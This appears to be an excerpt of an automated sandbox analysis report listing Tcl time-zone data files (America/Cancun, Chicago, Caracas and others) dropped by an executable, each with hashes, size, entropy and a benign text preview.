                                                                                                                                                                                                                                            SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                                            MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                                            SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                                            SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                                            SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1412
                                                                                                                                                                                                                                            Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                                            MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                                            SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                                            SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
                                                                                                                                                                                                                                            SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                                                            Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                                            MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                                            SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
                                                                                                                                                                                                                                            SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                                            SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):227
                                                                                                                                                                                                                                            Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                                            MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                                            SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                                            SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                                            SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                                            MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                                            SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                                            SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                                            SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.774923706273939
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE91mr4IAcGEu5pvn:SlSWB9vsM3y7oDSHAIgpdN/2909Yr49F
                                                                                                                                                                                                                                            MD5:AD6E086BEDF05A0BEB66990BD9518BEE
                                                                                                                                                                                                                                            SHA1:FA0B7E8D6931E79092A90F7EECBA2293AE886AE3
                                                                                                                                                                                                                                            SHA-256:C38C49AE1C3E67BD2118002DCFCC3C0EFB6892FB9B0106908A9282C414D0BF2E
                                                                                                                                                                                                                                            SHA-512:A1E40422D15DBCB24A6FE353639A1541FAD7F394D20F8AEB32D4E39667BA264C3E815BAA703B88B90D381540168016A0641CA220BACAF05E80EAA698642B6FFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Cayman) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11372
                                                                                                                                                                                                                                            Entropy (8bit):3.814348526052702
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:l6u30Ke1rdJ8SUklvgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:l1EKwdJ8SUkl4aUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:763E23AA7FB20F8D7CB2F0E87FAFD153
                                                                                                                                                                                                                                            SHA1:B131A10C1C208BB5E5E178ACD21A679FD0537AC5
                                                                                                                                                                                                                                            SHA-256:C7707AF88D650F90839E7258356E39D85228B33B6DBCC5C065C3D8733AE28CEE
                                                                                                                                                                                                                                            SHA-512:FE9C5D2EA253338DDFD79CC8ED2F94D6817BD770C0895752EFB1917E2313735C18475D67191C29BCCD53DEFFF35C1BF0CA5D98C92091DDCD1E97CD6302DC73A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                                            MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                                            SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                                            SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                                            SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                                            MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                                            SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                                            SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                                            SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                                            MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                                            SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                                            SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                                            SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):431
                                                                                                                                                                                                                                            Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                                            MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                                            SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                                            SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                                            SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                                            MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                                            SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                                            SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                                            SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2912
                                                                                                                                                                                                                                            Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                                            MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                                            SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                                            SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                                            SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                                            MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                                            SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                                            SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                                            SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1128
                                                                                                                                                                                                                                            Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                                            MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                                            SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                                            SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                                            SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2967
                                                                                                                                                                                                                                            Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                                            MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                                            SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                                            SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                                            SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                                                            Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                                            MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                                            SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                                            SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                                            SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                                            Malicious:false
